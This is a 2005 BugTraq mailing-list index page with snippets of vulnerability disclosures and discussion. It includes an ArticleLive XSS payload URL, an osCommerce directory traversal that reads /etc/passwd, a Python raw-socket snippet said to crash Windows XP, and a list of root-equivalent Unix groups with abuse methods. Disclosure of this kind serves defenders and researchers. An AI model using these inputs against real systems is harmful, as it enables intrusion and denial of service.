BugTraq Mode:
(Page 1357 of 1748)  < Prev  1352 1353 1354 1355 1356 1357 1358 1359 1360 1361 1362  Next >
Interspire ArticleLive 2005 (php version) is vulnerable to XSS 2005-03-23
mircia mircia (mircia security talte net)


Can you please confirm my suggestion that:

Interspire ArticleLive 2005 (php version) is vulnerable to XSS:

e.g.

http://localhost/articles/newcomment?ArticleId="><script>alert('hi
')</script>

// best wishes, mircia [mircia (at) security.talte (dot) net [email concealed]]

[ more ]  [ reply ]
Notacon: Apr. 8-10, 2005 in Cleveland, OH 2005-03-23
Froggy (froggy notacon org)
Notacon is the second iteration of an annual technology event held in
Cleveland, OH. The event will run from the morning of Friday, April 8th
through Sunday, April 10th. This years focus is on community and
technology. However, we have a number of interesting presentations and
tracks geared t

[ more ]  [ reply ]
SUSE Security Announcement: ImageMagick problems (SUSE-SA:2005:017) 2005-03-23
Marcus Meissner (meissner suse de)

-----BEGIN PGP SIGNED MESSAGE-----

________________________________________________________________________
______

SUSE Security Announcement

Package: ImageMagick
Announcement-ID: SUSE-SA:2005:017
Date: Wed, 2

[ more ]  [ reply ]
Re: Possible windows+python bug 2005-03-23
liquid cyberspace org
In-Reply-To: <20050322122118.16702.qmail (at) www.securityfocus (dot) com [email concealed]>

I would like to add few things:

1. bug has nothing to do with Python, I deeply apologise to Python developers (which is my favorite piece of software)

2. here is an example in C with same effect:

#include <winsock2.h>

void main() {

[ more ]  [ reply ]
RE: [VulnWatch] Details of Sybase ASE bugs withheld 2005-03-23
http-equiv (at) excite (dot) com [email concealed] (1 malware com)


What constitutes the 'technical details'. Have the little lawyer spell
that out in black and white, then work around it. Once that person who
practices law commits to their defintion, give us the indvidual's name so
that we can both chuckle and avoid 'renting' them in the future.

--
http://ww

[ more ]  [ reply ]
Backdoors in AS/400 emulations allow the server to attack connected PC workstations 2005-03-23
Shalom Carmel (shalom venera com)
Backdoors in AS/400 emulations allow the server to attack connected PC
workstations

Summary:

Nowadays, when working with legacy AS/400 applications, most people use
Telnet based terminal emulation programs, for example IBM Client Access.

The issue found is using these emulations in an unplanned

[ more ]  [ reply ]
[SIG^2 G-TEC] SurgeMail Webmail Attachment Upload and XSS Vulnerabilities 2005-03-23
chewkeong security org sg


SIG^2 Vulnerability Research Advisory

SurgeMail Webmail Attachment Upload and XSS Vulnerabilities

by Tan Chew Keong
Release Date: 23 Mar 2005

ADVISORY URL
http://www.security.org.sg/vuln/surgemail22g3.html

SUMMARY

SurgeMail (http://netwinsite.com/surgemail/) is a next generation Mail Server

[ more ]  [ reply ]
Security Development Lifecycle Whitepaper Available 2005-03-22
Michael Howard (mikehow microsoft com)
Microsoft has made publicly available our Security Development Lifecycle
(SDL) paper at http://msdn.microsoft.com/security/sdl.

The SDL is the process that Microsoft has implemented for the
development of software that needs to withstand malicious attack. The
process encompasses the addition of a

[ more ]  [ reply ]
Re: Re: Symantec Antivirus client locally created scheduled scan is not running if the local console is logged off 2005-03-22
Eitan Caspi (eitancaspi yahoo com)
Hello Bone Machine,

First of all, I would like to apologize I forgot to mention exactly that the
issue is ONLY with the "Corporate Edition" client, and not with any other
client by Symantec, as far as I have checked, since this is the only version
I have checked.

The issue here is with the initial

[ more ]  [ reply ]
Re: [ISN] How To Save The Internet 2005-03-22
Jason Coombs (jasonc science org) (1 replies)
David Gillett wrote:

> are the various rights of the owner

> of the CPU, the *operator* of the

> CPU, and the owner of the *data*,

> each of whom may have a more or

> less legitimate say in what code

> actually gets executed.

Nonsense. Absurd, ridiculous nonsense.

There is only one party

[ more ]  [ reply ]
Re: [ISN] How To Save The Internet 2005-03-23
Thor (Hammer of God) (thor hammerofgod com)
root-equivalent groups 2005-03-22
psz maths usyd edu au
Most UNIX/Linux installations have some groups (or users) whose members may
be able to become root, for example:

Group What Do
bin /usr/bin create trojan
disk /dev/hda raw write and create setuid root
kmem /dev/kmem read root password
shadow /etc/shadow crack root password
staff /usr/local/b

[ more ]  [ reply ]
Re: Possible windows+python bug 2005-03-22
azurIt (azurit pobox sk) (1 replies)


> On Tue, Mar 22, 2005 at 12:21:18PM -0000, liquid (at) cyberspace (dot) org [email concealed]
wrote:
> > Start Python and type (of course x.x.x.x should be replaced with
> > IP address):
> >
> > import socket
> > s=socket.socket(socket.AF_INET,socket.SOCK_RAW,4)
> > s.sendto("",("x.x.x.x",0))
> >
> > Press ENTER and your

[ more ]  [ reply ]
Re: Possible windows+python bug 2005-03-23
Kinnell (kinnell t gmail com)
RE: [VulnWatch] Details of Sybase ASE bugs withheld 2005-03-22
Marchand, Tom (Tom Marchand bcbsfl com) (1 replies)
And what happens when the vendor won't indemnify the researchers? No more security bulletins? Wouldn't the vendors love that. Or would security researchers become outlaws?

-----Original Message-----
From: Chris Wysopal [mailto:weld (at) vulnwatch (dot) org [email concealed]]
Sent: Tue 3/22/2005 4:26 PM
To: Marchand, Tom
C

[ more ]  [ reply ]
Re: [VulnWatch] Details of Sybase ASE bugs withheld 2005-03-23
Simple Nomad (thegnome nmrc org) (1 replies)
Re: Details of Sybase ASE bugs withheld 2005-03-23
Jay Libove (libove felines org)
RE: [VulnWatch] Details of Sybase ASE bugs withheld 2005-03-22
Marchand, Tom (Tom Marchand bcbsfl com) (2 replies)
If the bug was found by disassembling Sybase's code then Sybase probably does have a legal position to do this. I haven't read Sybase's EULA but most have a provision prohibiting reverse engineering of code.

-----Original Message-----
From: sean [mailto:infamous41md (at) hotpop (dot) com [email concealed]]
Sent: Mon 3/21/200

[ more ]  [ reply ]
RE: [VulnWatch] Details of Sybase ASE bugs withheld 2005-03-22
Chris Wysopal (weld vulnwatch org)
Re: [VulnWatch] Details of Sybase ASE bugs withheld 2005-03-22
sean (infamous41md hotpop com) (1 replies)
Re: [VulnWatch] Details of Sybase ASE bugs withheld 2005-03-23
Peter J. Holzer (hjp wsr ac at)
osCommerce File Manager Directory Traversal Vulnerability 2005-03-22
Megasky (magasky hotmail com) (1 replies)


there is allready a post on this that have
file_manager.php?action=download&filename=../../../../../../etc/passwd

sometime the action=download doesn't work , so i tried action=read
/admin/file_manager.php?action=read&filename=../../../../

[ more ]  [ reply ]
Re: osCommerce File Manager Directory Traversal Vulnerability 2005-03-23
Aikanáro Calaelen (aikanaro calaelen gmail com)
Black Hat Briefings & Trainings: Registration now open! 2005-03-22
Jeff Moss (jmoss blackhat com)
Dear BugTraq readers,

I would like to make some brief announcements regarding upcoming Black Hat events.

Our European show is coming to Amsterdam, March 31-April 1. Our on-line registration will be closing this Thursday, March 24. If you wish to register after March 24, you must register on-site.

[ more ]  [ reply ]
Possible windows+python bug 2005-03-22
liquid cyberspace org (1 replies)


This bug is produced on WindowsXP SP1 (OSVer : 5_1_2600) with Python2.3 installed.

Start Python and type (of course x.x.x.x should be replaced with IP address):

import socket
s=socket.socket(socket.AF_INET,socket.SOCK_RAW,4)
s.sendto("",("x.x.x.x",0))

Press ENTER and your win box should crash i

[ more ]  [ reply ]
Re: Possible windows+python bug 2005-03-22
Neil Schemenauer (nas-bugtraq arctrix com)
(Page 1357 of 1748)  < Prev  1352 1353 1354 1355 1356 1357 1358 1359 1360 1361 1362  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus